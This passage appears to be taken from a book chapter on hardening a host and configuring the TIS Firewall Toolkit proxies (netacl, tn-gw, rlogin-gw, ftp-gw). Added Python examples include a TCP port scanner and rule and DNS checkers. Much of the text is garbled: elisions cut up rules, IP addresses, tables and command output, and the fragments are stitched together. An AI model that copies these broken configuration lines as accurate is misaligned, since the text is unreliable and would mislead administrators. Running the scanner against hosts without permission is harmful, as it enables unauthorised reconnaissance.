#login    stream  tcp   nowait  root    /usr/libexec/tcpd       rlogind -a
#exec     stream  tcp   nowait  root    /usr/libexec/tcpd       rexecd
#uucpd    stream  tcp   nowait  root    /usr/libexec/tcpd       uucpd
#finger   stream  tcp   nowait  nobody  /usr/libexec/tcpd       fingerd
#tftp     dgram   udp   wait    nobody  /usr/libexec/tcpd       tftpd
#comsat   dgram   udp   wait    root    /usr/libexec/tcpd       comsat
#ntalk    dgram   udp   wait    root    /usr/libexec/tcpd       ntalkd
#pop      stream  tcp   nowait  root    /usr/libexec/tcpd       popper
#ident    stream  tcp   nowait  sys     /usr/libexec/identd     identd -l
#bootp    dgram   udp   wait    root    /usr/libexec/tcpd       bootpd -t 1
#echo     stream  tcp   nowait  root    internal
#discard  stream  tcp   nowait  root    internal
#chargen  stream  tcp   nowait  root    internal
#daytime  stream  tcp   nowait  root    internal
#tcpmux   stream  tcp   nowait  root    internal
#time     stream  tcp   nowait  root    internal
#echo     dgram   udp   wait    root    internal
#discard  dgram   udp   wait    root    internal
# chargen dgram   udp   wait    root    internal
# daytime dgram   udp   wait    root    internal
# time    dgram   udp   wait    root    internal
# Kerberos authenticated services
#klogin   stream  tcp   nowait  root    /usr/libexec/rlogind    rlogind -k
#eklogin  stream  tcp   nowait  root    /usr/libexec/rlogind    rlogind -k -x
#kshell   stream  tcp   nowait  root    /usr/libexec/rshd       rshd -k
# Services run ONLY on the Kerberos server
#krbupdate stream tcp   nowait  root    /usr/libexec/registerd  registerd
#kpasswd  stream  tcp   nowait  root    /usr/libexec/kpasswdd   kpasswdd

The reason for turning off all these services is to reduce the likelihood that your system will be compromised while the firewall is being installed and configured. ... With the /...conf file updated, inetd must be signaled to know that some changes have been made. ... pid

The process identifier (PID) can be procured, and inetd restarted, by using this command sequence:

pc# ps -aux | grep inetd
root   108  ...  144  200  ??  Is  3:03AM  0:00...  inetd
pc# kill -1 108

... 191 ... 150 ...
Some of these services are system specific, which might require some exploration. ... The daemons started from the system startup scripts that were turned off on the sample system are:

  gated, cgd, pcnfsd, rwhod, mountd, portmap, sendmail, named, printer, timed, nfsd, rstatd, xntpd, nfsiod

Tip: Although timed, the time server process, is turned off, you should still configure your firewall to get time updates via an NTP server; the firewall's logs are only useful for reconstructing events if its clock is accurate. ...


After turning off these daemons, the process table on the sample system now looks like this:

pc...org$ ps -aux
USER     PID  VSZ  RSS  TT  STAT STARTED COMMAND
chrish    89  280  304  p0  Ss    4:24AM -ksh (ksh)
root       1  124  244  ??  Is    4:18AM /sbin/init -
root       2    0   12  ??  DL    4:18AM (pagedaemon)
root      15  816  464  ??  Is    4:19AM mfs -o rw -s 1 ...
root      36  124  220  ??  Ss    4:19AM syslogd
root      71   72   72  ??  Ss    4:19AM update
root      73  284  256  ??  Is    4:19AM cron
root      75  140  192  ??  Ss    4:19AM inetd
root      84  220  292  co  Is+   4:19AM -csh (csh)
root      88  156  292  ??  S     4:24AM telnetd
root       0    0    0  ??  DLs   4:18AM (swapper)
chrish    95  136  232  p0  R+    4:24AM ps -aux
pc...org$
[The %CPU, %MEM and TIME columns did not survive extraction.]

The ps command output shown now represents a quiet system. ... 0 Operating System ... In the sample inetd ... This is illustrated in the output of the netstat command:
pc# netstat -a
Active Internet connections (including servers)
Proto Recv-Q Send-Q  Local Address      Foreign Address    (state)
tcp        0      0  pc...1037          ...                ESTABLISHED
tcp        0      0  *...               *...               LISTEN
udp        0      0  *...               *...
Active Unix domain sockets
Address  Type   Recv-Q Send-Q  Inode     Conn      Refs      Nextref   Addr
f0764400 dgram       0      0  0         f0665c94  0         f0665214
f074e480 dgram       0      0  0         f0665c94  0         0
f0665c00 dgram       0      0  f0665780  0         f06d6194  0         /dev/log
pc#

The tools directory in the Toolkit distribution includes a utility called portscan, which probes a system to determine what TCP services are currently being offered. ... The output of the command is shown here:

pc# ...
512
513
shell
1053
1054
1055
1056
1057
pc#

This command shows what ports were available prior to reducing the available services. ... conf and the startup files, the system now offers the following ports:

pc# ...
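A connect()-based TCP scanner, added here as an example (it is not the Toolkit's portscan program), that does what the text describes: it tries each port in a range against one host and lists the ports that accept a connection, naming them from the local services database where possible. Running it before and after trimming inetd.conf and the startup scripts gives the two listings the text compares. The open_listener and closed_port helpers exist only so the scanner can be exercised against the loopback interface; the host and port range are the caller's choice.

```python
"""TCP connect() scan in the spirit of the FWTK portscan utility.

Added example, not the Toolkit's own code.  A port is reported open when a
TCP handshake to it completes; nothing is sent on the connection."""
import socket
from concurrent.futures import ThreadPoolExecutor


def port_open(host, port, timeout=0.5):
    """True if host accepts a TCP connection on port within timeout seconds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:          # refused, timed out, unreachable ...
        return False


def scan(host, ports, timeout=0.5, workers=64):
    """Sorted list of the ports in `ports` that accepted a connection."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = pool.map(lambda p: (p, port_open(host, p, timeout)), ports)
    return sorted(p for p, ok in results if ok)


def service_name(port):
    """Name from the local services database, or the number if unknown."""
    try:
        return socket.getservbyport(port, "tcp")
    except OSError:
        return str(port)


def report(host, ports):
    """(port, name) pairs for the open ports, like portscan's listing."""
    return [(p, service_name(p)) for p in scan(host, ports)]


def open_listener(host="127.0.0.1"):
    """Start a listening socket on an ephemeral port (for local testing)."""
    srv = socket.socket()
    srv.bind((host, 0))
    srv.listen(5)
    return srv, srv.getsockname()[1]


def closed_port(host="127.0.0.1"):
    """Reserve an ephemeral port and release it, so it is known to be closed."""
    s = socket.socket()
    s.bind((host, 0))
    port = s.getsockname()[1]
    s.close()
    return port


if __name__ == "__main__":
    srv, p = open_listener()
    print(report("127.0.0.1", range(p - 5, p + 5)))
    srv.close()
```

Scanning the full 1-65535 range with a 0.5 s timeout and 64 workers takes a few minutes against a filtered host; against a host that answers with RST immediately, as a quiet inetd-based system does, it is fast.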


Configuring TCP/IP
For TIS to be effective as a firewall, the system on which it is running must not perform routing. ... If this occurs, services that are being constructed with the TIS Toolkit will not be used. ... IP forwarding causes a packet received on one interface to be retransmitted on whichever other interface leads toward its destination, so the traffic crosses the machine without ever touching the proxies. ...
[Figure 7.2: Multihomed machines ... 53 ... 62, 204 ... 3 ... 191 ... 150 ... 53 ... 62 ...]
The same is true for packets on the PPP link. ...

This type of arrangement is unsuitable for a firewall. ... Consequently, there is little or no point to going through this exercise if you leave IP forwarding enabled. ... The reason for this is that disabling IP forwarding involves changing some kernel parameters. ... Table 7.1 lists the parameters that must be changed for the identified operating systems. ...

Table 7.1  Disabling IP Forwarding
Operating System    Parameter
BSDI Version 2...   ...
SunOS 4...x         Run adb on the kernel to set IP_forwarding to -1, and save the modified kernel image. ... c) to set the variable to -1 by default and rebuild the kernel. ...

This removes any configured IP forwarding, and enables you to maximize the capabilities of the Toolkit. ...
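A check, added as an example and not part of the Toolkit or of the book's procedure, that reads the host's live forwarding setting so the change in Table 7.1 can be verified rather than assumed. It assumes the interfaces a practitioner meets today, the Linux /proc/sys/net/ipv4/ip_forward file and the sysctl names net.inet.ip.forwarding (BSD) and net.ipv4.ip_forward (Linux); none of these is on the page, and on the SunOS and BSDI kernels the text discusses you would inspect the kernel variable with adb instead.

```python
"""Verify that the firewall host is not forwarding IP packets.

Added example; the file and sysctl names are assumptions about modern
Linux and BSD hosts, not about the SunOS/BSDI kernels the text discusses."""
import subprocess


def forwarding_enabled(text):
    """Interpret '1'/'0', 'name: value' or 'name = value'; True means forwarding on."""
    value = text.strip().replace("=", ":").split(":")[-1].strip()
    if value not in ("0", "1"):
        raise ValueError("unexpected forwarding value: %r" % text)
    return value == "1"


def read_ip_forwarding():
    """Try the Linux proc file, then sysctl; None when neither is available."""
    try:
        with open("/proc/sys/net/ipv4/ip_forward") as f:
            return forwarding_enabled(f.read())
    except OSError:
        pass
    for name in ("net.inet.ip.forwarding", "net.ipv4.ip_forward"):
        try:
            out = subprocess.run(["sysctl", "-n", name], capture_output=True,
                                 text=True, check=True)
            return forwarding_enabled(out.stdout)
        except (OSError, subprocess.CalledProcessError, ValueError):
            continue
    return None


def firewall_host_ok():
    """The property the text requires: a proxy firewall must not route at all.
    An unreadable setting counts as a failure, not as a pass."""
    return read_ip_forwarding() is False


if __name__ == "__main__":
    print("IP forwarding:", read_ip_forwarding(), "- host acceptable:", firewall_host_ok())
```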



The netperm Table
The netperm table, found in /usr/local/etc/netperm-table, is the master configuration file for all the components in the Trusted Firewall Toolkit (netacl, smap, smapd, ftp-gw, tn-gw, and plug-gw). ... Saving the information in an in-memory database allows the information to be preserved even after a chroot system call is used to reset the directory structure. ... Each rule is the name of the application that rule applies to, followed by a colon. ... When an application extracts its configuration information, it only extracts the rules that apply to it, preserving the order in which they appeared in the file. ...

# sample rules for smap
smap, smapd:   userid 4
smap, smapd:   directory /mail/inspool
smap:          timeout 3600

Note: Comments regarding the rules can be inserted in the configuration file by starting the line with "#" as the first character. ...

When an application has matched a rule, the rule is translated into whitespace-delimited strings for later use. ... For the smap client and smapd server in the preceding example, the rules specify the userid to use when the application executes, the directory clause identifies the location of files, and the timeout clause indicates how long the server or client will wait before assuming that the remote end is "hung". ... For example, if the clause begins with a permit- or deny- modifier, the rule is internally flagged as granting or revoking permission for that clause. ...
ftpd: netacl-in ... ftpd: netacl-in ... 33 ... 117 -exec /usr/etc/in ... 137 ... 101 -exec /usr/etc/in ...
The default configuration for each of the application's clauses, and examples, are presented with the application's description. ...

These conventions promote consistency in the file, and help produce a more readable and maintainable rules list. ...

To better explain this process, consider this configuration rule:
netacl-in ... 33 ... 117 -exec /usr/etc/in ...
If the pattern to match consists entirely of digits and decimals, matching is performed against the IP address; otherwise, it is performed against the hostname. ...
ftpd: permit-hosts * ... net -exec /usr/etc/in ...
To prevent any vulnerability from DNS spoofing, it is highly recommended that the configuration rules be bound to IP addresses rather than hostnames: a hostname rule is only as trustworthy as the DNS data it is matched against. ...

When the application attempts to resolve an IP address to a domain name and the reverse lookup fails, the hostname is set to "unknown". ... When the Domain Name resolution is performed by the firewall, a check is made to ensure that the IP address for the DNS name returned by the reverse lookup is the same as the address the connection actually came from. ... If a hostname for this IP address cannot be located in the DNS system, the hostname is set to "unknown" and a warning is logged. ... This means that it is possible to allow any host in the Internet to pass through your firewall, or access certain services (or both), as long as reverse DNS, or IN-ADDR ...
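The double lookup described in the preceding paragraphs, written out as an added example (it is not the Toolkit's source): the client address is mapped to a name with a PTR query, the name is resolved forward again, and the name is kept only if the original address is among the results. Anything else becomes "unknown", the value that a deny-hosts unknown rule matches. The two lookup functions are injected so the logic runs offline against constructed records; the example.org/example.net names and the 192.0.2.x and 198.51.100.x addresses are assumptions (RFC 5737 documentation ranges), and the default lookups wrap the system resolver.

```python
"""Forward/reverse DNS consistency check, as netacl and the FWTK proxies
apply it before a hostname rule is matched.

Added example, not code from the TIS Firewall Toolkit."""
import socket


def system_ptr_lookup(ip):
    """Reverse (PTR) lookup; None when the address has no name."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except (socket.herror, socket.gaierror):
        return None


def system_forward_lookup(name):
    """Forward (A) lookup; the list of addresses the name resolves to."""
    try:
        return socket.gethostbyname_ex(name)[2]
    except (socket.herror, socket.gaierror):
        return []


def client_hostname(ip, ptr_lookup=system_ptr_lookup,
                    forward_lookup=system_forward_lookup):
    """Return (hostname, warning).

    hostname is the PTR name only if a forward lookup of that name yields the
    original address again; otherwise it is "unknown" and warning says why,
    which is what the Toolkit logs."""
    name = ptr_lookup(ip)
    if not name:
        return "unknown", "no reverse DNS entry for %s" % ip
    addrs = forward_lookup(name)
    if ip not in addrs:
        return "unknown", ("reverse lookup of %s gave %s, but %s resolves to %s: "
                           "possible DNS spoofing" % (ip, name, name, addrs or "nothing"))
    return name.lower(), None


# Constructed sample records.
SAMPLE_PTR = {
    "192.0.2.10": "stargazer.example.org",   # consistent pair
    "192.0.2.20": "trusted.example.org",     # PTR claims a trusted name ...
    "192.0.2.30": None,                      # no PTR record at all
}
SAMPLE_A = {
    "stargazer.example.org": ["192.0.2.10"],
    "trusted.example.org": ["198.51.100.5"],  # ... but that name lives elsewhere
}


def sample_lookup(ip):
    """client_hostname() evaluated against the constructed records."""
    return client_hostname(ip, SAMPLE_PTR.get, lambda n: SAMPLE_A.get(n, []))


if __name__ == "__main__":
    for ip in SAMPLE_PTR:
        print(ip, sample_lookup(ip))
```

The second record is the spoofing case the text warns about: whoever controls the reverse zone for 192.0.2.20 can put any name in it, but cannot make the forward zone for trusted.example.org point back at their address, so the forward check is what keeps a hostname rule honest.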


Configuring netacl
netacl is a network access control program; it provides a degree of access control for various TCP-based services available on the server. ... The netacl program and the appropriate rules enable you to create this setup. ...

The netacl program is started through inetd; after inetd performs some checks, netacl allows or denies the request for service from the remote user/system. ... conf file for netacl, it is important to know that netacl accepts only one argument: the name of the service to be started. ... conf file. ...
Before the ftpd daemon is started, the request is validated using the rules found in the netperm-table. ... For example, if the named service is ftpd, the rule name consists of netacl-ftpd, as in the following:

netacl-ftpd: permit-hosts 204...3...

... conf and the second from netperm-table, you can see that the command-line arguments and other information required for the daemon is found in netperm-table. ... As seen in the preceding command output, only the host 204...3... It does, however, mean that FTP requests can be sent through the firewall. ... Table 7.2 lists various keywords that are understood by the netacl program. ...
Table 7.2  The netacl Rules and Clauses
Service   Keyword                               Description
netacl    permit-hosts IP address or hostname   Specifies a permission rule to allow the named hosts. ...
          deny-hosts IP address or hostname     Specifies a permission rule to deny the named hosts. ... The denial of service is logged via syslogd. ...
          -exec program [arguments]             ... This option must be the final option in the rule, because everything after it is the command line to run. ...
          -user userid                          userid is the numeric UID or the name from a login in /etc/passwd that the program should use when it is started. ...
          -chroot directory                     ... This requires that the service program be present under the new root, and that the pathname for the executable be relative to the new root. ...
The messages printed in the syslog files resemble those shown here:

Oct 4 00:56:12 pc netacl[339]: deny host=stargazer ... org/204 ... 3 ... unilabs ... 191 ... 147 service=ftpd execute=/usr/libexec/ftpd

The first line in the log report indicates that the host stargazer...org was denied access to the ftp service through the netacl program. ... Notice that the logging information only specifies the service that was originated, and from where it originated. ... The sample netacl rules that follow illustrate the use of some of the parameters and clauses for netacl. ...
... telnetd: permit-hosts 198 ... 64 ... telnetd
netacl-in ... txt
netacl-in ... 191 ... * -exec /usr/etc/in ...
ftpd: permit-hosts * -chroot /home/ftp -exec /bin/ftpd -f

In this example, netacl is configured to permit telnet only for hosts in a particular subnet. ... This provides an easy and flexible means of politely informing someone that they are not permitted to use a service. ... ftpd, but all connections from other networks are connected to a version of the FTP server that is already chrooted to the FTP area, effectively making all FTP activity "captive". ... Testing requires verifying the rules configured for that service to ensure that they are in fact operating as they should. ...

... 191 ... 147 -exec /usr/libexec/ftpd -A -l

This rule says that FTP connections will be accepted only from the host 204...3... When this connection is received, the ftpd server with the appropriate arguments will be started. ...

... unilabs ...
220 pc...org FTP server (Version wu-2...
User (pc...org:(none)): chrish
331 Password required for chrish.
...
ftp>


As you can see from this output, the connection from the authorized machine to the target system did in fact work. ... The availability of this feature depends on the implementation of the ftpd that is in use at your site. ...

To illustrate, consider the exchange:

pc# ftp pc
Connected to pc...org.
...

On the target system, a deny informational message is written to the syslog and to the console:

Oct 4 02:53:12 pc netacl[1775]: deny host=pc...org/204...3...

Meanwhile, the system administrator knows that the remote has been attempting to gain access. ...

Such a blunt response to an unauthorized attempt to gain access might not be the most appreciated. ...

... 191 ... 147 -exec /bin/cat /usr/local/etc/noftp ...

... 191 ... 147 will not be refused a connection; he or she will just not get what they want. ...

For example, when you attempt to connect to your server, the /usr/local/etc/noftp ...

... unilabs ...
**** ATTENTION ****
Your attempt to use this server's FTP facility is not permitted due to
organizational security policies. ...

Use of the FTP Services on this machine is restricted to specific sites. ...
... com ...

C:\ >

Any type of message can be displayed here instead of allowing access to the requested service. ...


Restarting inetd
Remember that after each reconfiguration of the inetd ... To do this, you must find the Process ID or PID number for inetd and send a SIGHUP to it. ...
... 0 0 ... 0 1 ... 02 grep inetd 0:00 ...
... conf file and applies the new configuration immediately. ... Specific systems are IRIX and some versions of SunOS. ... They make the change, but forget to restart inetd. ...

In many circumstances, a system administrator may not want to allow telnet access through the firewall, either into or out of the private network. ... The intent behind using Telnet with netacl is to allow access to the firewall host. ...

Because of the dilemma of allowing remote administrative access and establishing a proxy telnet, it is common for the firewall administrator to run the real telnetd on a TCP port other than the default, and to place the proxy on the standard TCP port. ... conf has been changed to reflect the configuration shown here:

telnet    stream  tcp  nowait  root  /usr/local/etc/tn-gw   tn-gw
telnet-a  stream  tcp  nowait  root  /usr/local/etc/netacl  telnetd

The telnet-a service name must also be added to /etc/services with the port number chosen for it; inetd looks the name up there and will not start a listener for a name it cannot resolve.

When an incoming connection is received on the telnet port with this configuration, the tn-gw application is started. ... Access to the proxy is determined by the rules established in the netperm-table. ...

However, there are application-specific parameters. ...
Table 7.3  tn-gw Rules and Clauses
Option                                        Description
userid user                                   Specify a numeric user-id or the name of a password file entry. ...
directory pathname                            Specifies a directory to which tn-gw will chroot(2) prior to providing service. ...
denial-msg filename                           Specifies the name of a file to display to the remote user if he or she is denied permission to use the proxy. ...
timeout seconds                               Specifies the number of seconds of idleness after which the proxy should disconnect. ...
welcome-msg filename                          Specifies the name of a file to display as a welcome banner upon successful connection. ...
help-msg filename                             Specifies the name of a file to display if the "help" command is issued. ...
denydest-msg filename                         Specifies the name of a file to display if a user attempts to connect to a remote server for which he or she is not authorized. ...
authserver hostname [portnumber [cipherkey]]  Specifies the name or address of a system to use for network authentication. ... If support for DES encryption of traffic is present in the server, an optional cipherkey can be provided to secure communications with the server. ...
hosts host-pattern [host-pattern2 ...] [options]  Rules specify host and access permissions. ...

tn-gw:  denial-msg   /usr/local/etc/tn-deny...txt
tn-gw:  help-msg     /usr/local/etc/tn-help...
tn-gw:  ...
tn-gw:  ... 191 ... * -dest * ...
tn-gw:  ... net -dest !* -passok -xok

Note: If any of the files identified in the denial-msg, welcome-msg, help-msg, or denydest-msg clauses are missing, the connection will be dropped as soon as a request is made for that file. ... The timeout line indicates how long the telnet connection can be idle before the firewall will terminate it. ... This rule and the optional parameters are discussed shortly. ...

**** ATTENTION ****
Your attempt to use this server's telnet proxy is not permitted due to
organizational security policies. ...

Use of the telnet proxy Service on this machine is restricted to specific sites. ...
... com ...

The commands available within the tn-gw shell are listed in table 7.4. ...

Table 7.4  ...
...       Access to the remote host may be denied based on a host destination rule. ...
...       By default, the display name is the connecting machine followed by :0 ... myorg...0 ...
help, ?   Displays a user-definable help file. ...

Connecting through the Telnet Proxy
When a permitted host connects to the proxy, it is greeted by the contents of the welcome file (configured in the tn-gw options) and by a prompt. ... 7.4 ...

If the connection is permitted, the connection is made. ...

... com
Enter Command>c sco...com
Not permitted to connect to sco...com
Enter Command>c nds...net
Trying 204...124...

SunOS Unix (nds...net)
login:

In this output you can see that a telnet connection is established to the firewall, from which the tn-gw application is started. ... sco ... A second connection request to nds...net is then permitted. ...

This means that a given system may be blocked through options on the host command in the tn-gw rules. ... As seen in table 7... 33 ... * 192 ... 214 ... arpa domain are unknown, and therefore denied, or that hosts connecting from the network 192...112 and 192...214 are allowed to connect to the proxy. ...

Earlier output showed that the connect request to sco ... This was configured by using the rule:

tn-gw:  permit-hosts 204...3... fonorola...

... 191 ... net domain, but no others. ... The -dest parameter, described in table 7.5, ... If no list is specified, then the user is not restricted to connecting to any host. ...
Table 7.5  Host Access Rules
Rule                               Description
-dest pattern                      ... If no list is specified, all destinations are considered valid. ... -dest entries preceded with a "!" character are treated as negation entries. ...
-dest { pattern1 pattern2 ... }
-passok                            Specifies that the proxy should permit users to change their passwords if they are connected from the designated host. ...


The -dest options are applied in the order that they appear in the line
...
sco
...
net domain is not matched
...
The “!” is a negation
operator, indicates that this is not permitted
...
191
...
net domain, and no others
...
Before the connection is permitted, the tn-gw application attempts to validate the IP address
...
Otherwise, the connection is dropped
...
For example, if a user connects to tn-gw and enters the help command, does
the user get the requested information? Are the restricted sites in fact restricted?
This verification is accomplished by exercising each of the rules
...
191
...
* -dest *
...
net -dest !*


The operation of this rule can be easily verified, once it is clear what is being controlled. ... 191 ... net domain. ...

This can be easily verified by using telnet to contact tn-gw and attempting to connect to a site within the fonorola ... If the fonorola ...

For example, consider the following rules:

tn-gw:  permit-hosts 204...3... fonorola...
tn-gw:  ... 191 ... 150

If the connecting host is from the 204...3 network, access is granted to the proxy, but the user can only connect to the sites in the fonorola ... The second line says that any host attempting to access 204...3... Should the second line be first in the file, access to the proxy server itself would not be permitted, because the first rule that matches the connecting host decides and the rules after it are never consulted. ... Or, write them in order of use, after conducting some traffic analysis to determine where the traffic is going. ...
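The rule-matching behaviour described in this section, from the netperm-table format and the IP-versus-hostname pattern rule introduced under "The netperm Table" through the ordered -dest list and the rule-ordering pitfall in the paragraphs just above, implemented as one added example (it is not the Toolkit's own parser): rules are selected by application name and kept in file order, a pattern made only of digits, dots and wildcards is compared with the address and any other pattern with the hostname, the first matching permit-hosts/deny-hosts rule decides, and -dest entries are applied left to right with "!" as negation. The sample tables, the tn-gw/rlogin-gw application names and the example.* destinations are constructed; the addresses are from the RFC 5737 documentation ranges.

```python
"""netperm-table parsing and host/destination rule evaluation.

Added example, not the TIS Firewall Toolkit's code."""
from fnmatch import fnmatchcase


def parse_netperm(text):
    """Return [(set_of_apps, words)] in file order; '#' lines are comments."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        apps, _, clause = line.partition(":")
        rules.append(({a.strip() for a in apps.split(",")}, clause.split()))
    return rules


def rules_for(rules, app):
    """Only the rules naming this application, order preserved."""
    return [words for apps, words in rules if app in apps]


def host_matches(pattern, ip, hostname):
    """Digits, dots and '*' only: compare with the address; otherwise compare
    (case-insensitively) with the hostname, which may be the literal 'unknown'."""
    if set(pattern) <= set("0123456789.*"):
        return fnmatchcase(ip, pattern)
    return fnmatchcase(hostname.lower(), pattern.lower())


def split_host_rule(words):
    """'permit-hosts P1 P2 -opt ...' -> (patterns, options); the patterns end
    at the first word that starts with '-'."""
    i = 1
    while i < len(words) and not words[i].startswith("-"):
        i += 1
    return words[1:i], words[i:]


def host_decision(rules, app, ip, hostname):
    """('permit'|'deny', options) from the FIRST matching host rule; a host
    that no rule mentions is denied."""
    for words in rules_for(rules, app):
        if words[0] in ("permit-hosts", "deny-hosts"):
            patterns, options = split_host_rule(words)
            if any(host_matches(p, ip, hostname) for p in patterns):
                return words[0].split("-")[0], options
    return "deny", []


def dest_patterns(options):
    """Collect -dest entries left to right; '-dest { a b }' contributes a, b."""
    pats, i = [], 0
    while i < len(options):
        if options[i] == "-dest":
            i += 1
            if options[i] == "{":
                i += 1
                while options[i] != "}":
                    pats.append(options[i])
                    i += 1
            else:
                pats.append(options[i])
        i += 1
    return pats


def dest_allowed(options, dest_ip, dest_name):
    """No -dest list means every destination; otherwise the first matching
    entry decides, and an entry beginning with '!' denies."""
    pats = dest_patterns(options)
    if not pats:
        return True
    for p in pats:
        if host_matches(p.lstrip("!"), dest_ip, dest_name):
            return not p.startswith("!")
    return False


def check(table_text, app, src_ip, src_name, dst_ip, dst_name):
    """Would app let src reach dst under this table?"""
    decision, options = host_decision(parse_netperm(table_text), app, src_ip, src_name)
    return decision == "permit" and dest_allowed(options, dst_ip, dst_name)


# Constructed tables.
SAMPLE_TABLE = """
# hosts without consistent reverse DNS are refused outright
tn-gw:            deny-hosts unknown
# the inside network may reach *.example.net and nothing else
tn-gw:            permit-hosts 192.0.2.* -dest *.example.net -dest !* -passok
tn-gw, rlogin-gw: timeout 3600
"""
# The same two rules in each order: the catch-all deny must come LAST.
ORDER_OK = "tn-gw: permit-hosts 192.0.2.* -dest *.example.net\ntn-gw: deny-hosts *\n"
ORDER_BAD = "tn-gw: deny-hosts *\ntn-gw: permit-hosts 192.0.2.* -dest *.example.net\n"
```

check() is the test the text recommends, run from the table rather than from a keyboard: each (source, destination) pair your policy cares about, including a few that must fail, can be asserted against the file before inetd is signalled.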


This type of configuration is advantageous because it ensures that the firewall cannot be
accessed through the proxy, and leaves the telnet server available through the netacl program,
which has been configured to listen on a different port
...


Configuring the rlogin Gateway
The rlogin proxy provides a service similar to the telnet proxy with the exception of access
being provided through the rlogin service rather than telnet
...

Consequently, the only access to the firewall host is through telnet
...
For
example, the rlogin service provides rules for additional authentication that allow the connection to be granted without the user logging in like telnet
...
The
rules that are available for the rlogin-gw service are listed and explained in table 7
...



Table 7...  rlogin-gw Rules and Clauses
Option                                            Description
userid user                                       ... If this value is specified, rlogin-gw will set its user id before providing service. ...
prompt string                                     Specifies a prompt for rlogin-gw to use while it is in command mode. ...
denial-msg filename                               ... If this option is not set, a default message is generated. ...
timeout seconds                                   ... Default is no timeout. ...
welcome-msg filename                              ... If this option is not set, a default message is generated. ...
help-msg filename                                 ... If this option is not set, a list of the internal commands is printed. ...
denydest-msg filename                             ... If this option is not set, a default message is generated. ...
authserver hostname [portnumber [cipherkey]]      ... If rlogin-gw is built with a compiled-in value for the server and port, these will be used as defaults but can be overridden if specified on this line. ...
hosts host-pattern [host-pattern2 ...] [options]  ...



To illustrate the use of these rules to configure the rlogin-gw service, examine these sample rules from the netperm-table file:

rlogin-gw:  denial-msg    /usr/local/etc/rlogin-deny...txt
rlogin-gw:  help-msg      /usr/local/etc/rlogin-help...txt
rlogin-gw:  timeout       3600
rlogin-gw:  prompt        "Enter Command>"
rlogin-gw:  permit-hosts  204...3... fonorola ... 191 ... 150
rlogin-gw:  ...
rlogin-gw:  ...
rlogin-gw:  ...

Note: If any of the files identified in the denial-msg, welcome-msg, help-msg, or denydest-msg clauses are missing, the connection will be dropped as soon as a request is made for that file. ... One exception is that the rlogin-gw is configured to display a different message when a connection request is made for a restricted host. ...

... com
Enter Command>c fox...ca
*** ATTENTION ***
You have attempted to contact a restricted host from this rlogin proxy. ...

Your ...

To report problems, please contact Network Security Services at 555-1212 or
by e-mail at security@org...



Connecting through the rlogin Proxy
Connecting through the rlogin proxy requires a process similar to the telnet proxy. ... The commands supported by the rlogin proxy are the same as for the telnet proxy. ...

... unilabs ... com
Enter Command>c nds...net
Trying chrish@204...124...

Password:
Last login: Sun Oct 8 20:33:26 from pc...org
SunOS Release 4...4 (GENERIC) #1: Wed Sep 13 19:50:02 EDT 1995
You have mail. ...

Before the connection request is made, the local username is added to the left of the requested hostname. ... fonorola ... fonorola ...

The establishment of the rlogin session to the remote host is then a matter of how the service is configured on that host. ... rhosts file, because that is the machine where the connection is coming from, not the real originating host. ... The host rules use the following format:

rlogin-gw:  deny-hosts unknown
rlogin-gw:  hosts 192...112...94... *


In this example, hosts that cannot be found in the DNS in-addr ... 33 ... 94 ... The optional parameters, each of which begins with a hyphen, further restrict the hosts that can connect to the proxy by limiting where they can connect. ...

For example, if your security policy states that only certain hosts can connect to the rlogin proxy, you must test this from each of the permitted hosts, and also test the connection from a few hosts that are not permitted. ...


Configuring the FTP Gateway
The FTP proxy allows FTP traffic through the firewall to either private or public networks. ... From there a connection could be made to the firewall, although it is not a good idea to allow FTP traffic to the firewall on the default port. ... A more secure setup would be to run the FTP server processes when a connection is made to a different port. ...

Remember that the FTP service is found on port 21 as stated in the /etc/services file. ... Establish this ftp-a service to run on a different port, such as 2021. ... The /etc/inetd ...

The trick here is to configure the inetd ... When a connection is made to the ftp-a port, the real ftp server is started through the netacl application:

# ftp    stream  tcp  nowait  root  /usr/libexec/tcpd      ftpd -l -A
ftp      stream  tcp  nowait  root  /usr/local/etc/ftp-gw  ftp-gw
ftp-a    stream  tcp  nowait  root  /usr/local/etc/netacl  ftpd

Three entries for the FTP service are included here to illustrate a point. ...
...



The second entry establishes a connection to the FTP proxy. ... Examine the configuration of the ftp-gw proxy application first. ... Table 7... 

Table 7...  ftp-gw Rules and Clauses
Option                   Description
userid user              ... If this value is specified, ftp-gw will set its userid before providing service. ...
denial-msg filename      Specifies the name of a file to display to the remote user if he or she is denied permission to use the proxy. ... When the denial-msg file is displayed to the remote user, each line is prefixed with the FTP codes for permission denied. ... If this option is not set, a default message is generated. ...
help-msg filename        ... If this option is not set, a list of the internal commands is printed. ...
denydest-msg filename    ... If this option is not set, a default message is generated. ...
timeout seconds          ... When the specified number of seconds elapses with no activity through the proxy server, it will disconnect. ...

If these options are not used, default values are used instead. ...

... txt
... /usr/local/etc/ftp-welcome...txt
ftp-gw:  timeout 3600
ftp-gw:  denydest-msg /usr/local/etc/ftp-badest...

Host Access Rules
The host rules that permit and deny access to the ftp proxy can be modified by a number of additional options. ... 33 ... * 192 ... 214 ... arpa domain are unknown, and therefore denied; hosts connecting from the network 192...112 and 192...214 are allowed to connect to the proxy. ...

Like the other proxy agents, a number of options, listed in table 7..., ...

Table 7...  ftp-gw Host Access Options
Option                            Description
-dest pattern                     Specifies a list of valid destinations. ... The -dest list is processed in the order it appears on the options line. ...
-dest { pattern1 pattern2 ... }
-auth                             Specifies that the proxy should require a user to authenticate with a valid userid prior to being permitted to use the gateway. ...
-passok                           ... Only hosts on a trusted network should be permitted to change passwords, unless token-type authenticators are distributed to all users. ...

Before the connection is permitted, the ftp-gw application attempts to validate the IP address. ... Otherwise, the connection is dropped. ... For example, if you are allowing FTP sessions to originate from the private network, but deny FTP access to hosts outside the private network, then the ftp-gw rules would look like:
ftp-gw:  permit-hosts 206...65...

... To prove the proper operation of the proxy, a connection from the public network to a machine on the private network must be attempted. ...

... unilabs ... unilabs ...
220-Welcome to the URG Firewall FTP Proxy
220-
220-To report problems, please contact Network Security Services at 555-1212 or
220-by e-mail at security@org...
... unilabs ... fonorola ... fonorola ... fonorola ... )
331 Password required for chrish.
...
ftp>

Notice that the user was allowed access to the ftp proxy, and an FTP session was established to the machine nds...net. ... The following output illustrates this restriction:

bash$ ftp pc...org
Connected to pc...org.
...
500-Your connection attempt has been logged
500-and recorded.
